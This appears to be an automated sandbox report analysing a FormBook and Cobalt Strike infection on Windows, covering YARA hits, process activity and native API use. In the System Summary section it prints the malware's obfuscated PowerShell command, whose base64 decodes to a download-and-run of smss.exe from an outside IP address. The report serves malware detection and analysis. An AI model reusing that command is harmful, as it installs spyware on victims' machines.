E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2697502538.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2699158883.0000000005780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1800345962.0000000003A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1799971563.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2695985493.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2697439176.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1800824318.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2697537339.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Detected Cobalt Strike Beacon
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSHeLL.exe -Ex byPaSS -nop -W 1 -c dEvICecRedENtIaLdEPLoYmeNt.Exe ; iex($(iEx('[sysTEM.teXt.eNCoDInG]'+[ChaR]58+[chaR]58+'UtF8.geTsTrInG([syStem.ConvErt]'+[cHar]0x3a+[ChAR]0X3a+'fROmBaSe64sTRinG('+[chAr]34+'JHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQkVyRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQcm5YLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd21FR1hFYW9CdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcFRLLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q21MZyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicFh0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBDeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMzIvNzAvc21zcy5leGUiLCIkRU52OkFQUERBVEFcc21zcy5leGUiLDAsMCk7U1RhUnQtc0xFRVAoMyk7aW52T2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxzbXNzLmV4ZSI='+[ChaR]34+'))')))" Jump to behavior
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: This is a third-party compiled AutoIt script. 6_2_00A23B3A
Source: smss.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: smss.exe, 00000006.00000000.1539239351.0000000000AD4000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c6824d6d-c
Source: smss.exe, 00000006.00000000.1539239351.0000000000AD4000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_f1e1e4ec-a
Source: smss.exe.3.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_01797c66-5
Source: smss.exe.3.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_2d41266b-7
Source: smss[1].exe.3.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_68a9972c-8
Source: smss[1].exe.3.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_6289a901-7
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\smss.exe Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\smss[1].exe Jump to dropped file
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0042CA23 NtClose, 7_2_0042CA23
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B735C0 NtCreateMutant,LdrInitializeThunk, 7_2_03B735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72B60 NtClose,LdrInitializeThunk, 7_2_03B72B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_03B72DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B74340 NtSetContextThread, 7_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B73090 NtSetValueKey, 7_2_03B73090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B73010 NtOpenDirectoryObject, 7_2_03B73010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B74650 NtSuspendThread, 7_2_03B74650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72BA0 NtEnumerateValueKey, 7_2_03B72BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72B80 NtQueryInformationFile, 7_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72BF0 NtAllocateVirtualMemory, 7_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72BE0 NtQueryValueKey, 7_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72AB0 NtWaitForSingleObject, 7_2_03B72AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72AF0 NtWriteFile, 7_2_03B72AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72AD0 NtReadFile, 7_2_03B72AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B739B0 NtGetContextThread, 7_2_03B739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72FB0 NtResumeThread, 7_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72FA0 NtQuerySection, 7_2_03B72FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72F90 NtProtectVirtualMemory, 7_2_03B72F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72FE0 NtCreateFile, 7_2_03B72FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72F30 NtCreateSection, 7_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72F60 NtCreateProcessEx, 7_2_03B72F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72EA0 NtAdjustPrivilegesToken, 7_2_03B72EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72E80 NtReadVirtualMemory, 7_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72EE0 NtQueueApcThread, 7_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72E30 NtWriteVirtualMemory, 7_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72DB0 NtEnumerateKey, 7_2_03B72DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72DD0 NtDelayExecution, 7_2_03B72DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72D30 NtUnmapViewOfSection, 7_2_03B72D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72D10 NtMapViewOfSection, 7_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B73D10 NtOpenProcessToken, 7_2_03B73D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72D00 NtSetInformationFile, 7_2_03B72D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B73D70 NtOpenThread, 7_2_03B73D70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72CA0 NtQueryInformationToken, 7_2_03B72CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72CF0 NtOpenProcess, 7_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72CC0 NtQueryVirtualMemory, 7_2_03B72CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72C00 NtQueryInformationProcess, 7_2_03B72C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72C70 NtFreeVirtualMemory, 7_2_03B72C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72C60 NtCreateKey, 7_2_03B72C60
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 6_2_00A8A1EF
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A78310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 6_2_00A78310
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 6_2_00A851BD
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A2E6A0 6_2_00A2E6A0
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A4D975 6_2_00A4D975
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A421C5 6_2_00A421C5
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A562D2 6_2_00A562D2
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00AA03DA 6_2_00AA03DA
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A5242E 6_2_00A5242E
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A425FA 6_2_00A425FA
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A366E1 6_2_00A366E1
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A7E616 6_2_00A7E616
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A5878F 6_2_00A5878F
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A88889 6_2_00A88889
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A38808 6_2_00A38808
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A56844 6_2_00A56844
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00AA0857 6_2_00AA0857
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A4CB21 6_2_00A4CB21
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A56DB6 6_2_00A56DB6
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A36F9E 6_2_00A36F9E
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A33030 6_2_00A33030
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A43187 6_2_00A43187
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A4F1D9 6_2_00A4F1D9
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A21287 6_2_00A21287
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A41484 6_2_00A41484
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A35520 6_2_00A35520
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A47696 6_2_00A47696
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A35760 6_2_00A35760
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A41978 6_2_00A41978
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A59AB5 6_2_00A59AB5
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A2FCE0 6_2_00A2FCE0
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A4BDA6 6_2_00A4BDA6
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A41D90 6_2_00A41D90
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00AA7DDB 6_2_00AA7DDB
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A33FE0 6_2_00A33FE0
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A2DF00 6_2_00A2DF00
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_01A7A628 6_2_01A7A628
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00418993 7_2_00418993
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0042F043 7_2_0042F043
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041017A 7_2_0041017A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00410183 7_2_00410183
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00403190 7_2_00403190
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00401240 7_2_00401240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040E383 7_2_0040E383
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00416B8F 7_2_00416B8F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00416B93 7_2_00416B93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004103A3 7_2_004103A3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00402C74 7_2_00402C74
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040E4C7 7_2_0040E4C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040E4D3 7_2_0040E4D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00402C80 7_2_00402C80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040E51C 7_2_0040E51C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004045E4 7_2_004045E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004047A5 7_2_004047A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B8739A 7_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C003E6 7_2_03C003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E3F0 7_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF132D 7_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFA352 7_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2D34C 7_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B452A0 7_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B2C0 7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4B1B0 7_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C001AA 7_2_03C001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF81CC 7_2_03BF81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BDA118 7_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0B16B 7_2_03C0B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B30100 7_2_03B30100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B7516C 7_2_03B7516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF70E9 7_2_03BF70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFF0E0 7_2_03BFF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF0CC 7_2_03BEF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFF7B0 7_2_03BFF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3C7C0 7_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B64750 7_2_03B64750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5C6E0 7_2_03B5C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF16CC 7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BDD5B0 7_2_03BDD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C00591 7_2_03C00591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40535 7_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF7571 7_2_03BF7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEE4F6 7_2_03BEE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFF43F 7_2_03BFF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B31460 7_2_03B31460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF2446 7_2_03BF2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5FB80 7_2_03B5FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B7DBF9 7_2_03B7DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF6BD7 7_2_03BF6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFFB76 7_2_03BFFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFAB40 7_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BDDAAC 7_2_03BDDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B85AA0 7_2_03B85AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3EA80 7_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEDAC6 7_2_03BEDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB3A6C 7_2_03BB3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFFA49 7_2_03BFFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF7A46 7_2_03BF7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B429A0 7_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0A9A6 7_2_03C0A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B56962 7_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B49950 7_2_03B49950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B950 7_2_03B5B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B268B8 7_2_03B268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6E8F0 7_2_03B6E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B438E0 7_2_03B438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B42840 7_2_03B42840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4A840 7_2_03B4A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFFFB1 7_2_03BFFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41F92 7_2_03B41F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4CFE0 7_2_03B4CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B32FC8 7_2_03B32FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B60F30 7_2_03B60F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B82F28 7_2_03B82F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFFF09 7_2_03BFFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB4F40 7_2_03BB4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B49EB0 7_2_03B49EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B52E90 7_2_03B52E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFCE93 7_2_03BFCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFEEDB 7_2_03BFEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFEE26 7_2_03BFEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40E59 7_2_03B40E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B58DBF 7_2_03B58DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3ADE0 7_2_03B3ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5FDC0 7_2_03B5FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4AD00 7_2_03B4AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF7D73 7_2_03BF7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF1D5A 7_2_03BF1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B43D40 7_2_03B43D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0CB5 7_2_03BE0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B30CF2 7_2_03B30CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFFCF2 7_2_03BFFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB9C32 7_2_03BB9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40C00 7_2_03B40C00
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: String function: 00A48900 appears 42 times
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: String function: 00A40AE3 appears 70 times
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: String function: 00A27DE1 appears 35 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B75130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BBF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BAEA12 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B2B970 appears 266 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B87E54 appears 88 times
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winHTA@19/26@6/7
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A8A06A GetLastError,FormatMessageW, 6_2_00A8A06A
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A781CB AdjustTokenPrivileges,CloseHandle, 6_2_00A781CB
